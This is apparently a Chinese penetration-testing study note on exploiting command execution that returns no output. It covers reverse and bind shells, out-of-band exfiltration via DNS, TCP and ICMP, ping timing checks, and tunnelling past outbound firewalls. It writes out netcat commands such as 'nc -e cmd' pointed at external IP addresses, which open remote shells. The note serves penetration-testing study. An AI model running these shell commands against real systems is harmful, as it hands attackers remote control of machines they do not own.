数据不回显 反弹&带外&延迟&写文件

原因：代码层面函数调用问题，没有输出测试等

过程：

1、判断是不是数据不回显并且有漏洞

2、有这个漏洞如何把执行的数据到呢

解决：

1、反弹权限

判定目标

判定目标的操作系统

https://forum.ywhack.com/shell.php
https://cloud.tencent.com/developer/article/1906240

nc -e cmd 119.45.254.149 7777
nc -lvp 7777

2、数据带外

DNSlog

TCP-Portlog

ICMP-Sizelog

3、延迟判断

发包看回显时间

Win：ping -n 3 127.0.0.1

Linux：ping -c 3 127.0.0.1

4、写访问文件

写静态文件或写入可访问的文件确定

5、其他：根据环境

文件下载等（反链的意义）

数据不出网-原因解决-正反连接&出入站策略&隧道

环境：Windows外网靶机 Linux外网攻击机

拓展思考：Windows内网靶机或Linux内网攻击机呢

流程：

1、判断出入限制

2、判断出入限制的端口和协议

3、分析原因用正向还是反向还是隧道

原因：主机或应用防火墙出站限制

解决：利用NC反弹实验

1、正向连接

2、反向连接

3、隧道技术

实验：相对于靶机角度

1、开启入站策略，采用反向连接

反向连接：主动给出去，对方监听

//绑定CMD到目标IP的6666端口

nc -e cmd 146.56.193.187 6666

//等待6666连接

nc -lvvp 6666

2、开启出站策略，采用正向连接

正向连接：本地监听等待对方连接

//绑定CMD到本地6666端口

nc -e cmd -lvvp 6666

//主动连接目标6666

nc 43.134.218.194 6666

3、开启出站策略，采用其他协议隧道

ICMP,DNS等隧道技术

由上述内容发现还需那些内容学习：

1、其他反弹项目使用 工具或自带命令

2、系统操作命令使用 文件下载

3、复杂内网通讯隧道